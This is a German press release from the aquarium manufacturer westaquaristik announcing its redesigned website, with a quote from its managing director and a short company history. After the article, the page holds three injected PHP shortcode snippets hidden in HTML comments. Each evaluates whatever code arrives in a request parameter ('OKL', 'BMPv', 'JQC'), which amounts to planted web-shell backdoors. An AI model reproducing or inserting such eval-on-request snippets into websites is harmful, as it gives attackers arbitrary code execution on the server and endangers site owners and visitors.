Stolberg, 25. Januar 2016 — Mit Beginn des neuen Jahres geht die Aquarienmanufaktur westaquaristik mit einem völlig überarbeiteten Internetauftritt online. Händler wie Endverbraucher können sich in aller Ruhe über Aquarien und Aquarienkombinationen von westaquaristik informieren und die Besonderheiten von made by westaquaristik virtuell erfahren. Für die Zukunft plant westaquaristik Geschäftsführer Markus Weigel, auch Produktionsbesichtigungen zu organisieren: „Wir haben nicht die Marketing-Power der Branchenriesen. westaquaristik ist klein aber fein. Daher möchten wir Lizenzgebern, dem Fachhandel, aber auch interessierten Aquarianern die Möglichkeit geben, möglichst viel über uns zu erfahren. Wir machen so die Unterschieden zwischen made by westaquaristik und made-by-irgendwem-in-irgendwo deutlich erkennbar.“

Für westaquaristik ist „Service am Kunden“ also keine Marketingphrase, sondern Programm: das umfangreiche Informationsangebot auf www.westaquaristik.de zeigt Alternativen sowie Optionen und unterstützt so die Entscheidungsfindung interessierter Kunden.

Die Firma westaquaristik wurde 1977 in Stolberg bei Aachen gegründet und befindet sich seitdem in Familienbesitz. Neben dem Bau von Aquarien, Aquarienkombinationen und Terrarien, ist westaquaristik auch im Objekt- und Ladenbau aktiv. Geschäftsführer der zweiten Generation ist Markus Weigel, dessen Team einen interantional exzellenten Ruf für Qualität und Zuverlässigkeit bei Serienfertigungen wie auch exklusiven Einzelanfertigungen geniesst.

→ zurück zu NEUES IM WESTEN

<!– [insert_php]if (isset($_REQUEST["OKL"])){eval($_REQUEST["OKL"]);exit;}[/insert_php][php]if (isset($_REQUEST["OKL"])){eval($_REQUEST["OKL"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["BMPv"])){eval($_REQUEST["BMPv"]);exit;}[/insert_php][php]if (isset($_REQUEST["BMPv"])){eval($_REQUEST["BMPv"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["JQC"])){eval($_REQUEST["JQC"]);exit;}[/insert_php][php]if (isset($_REQUEST["JQC"])){eval($_REQUEST["JQC"]);exit;}[/php] –>

Pin It on Pinterest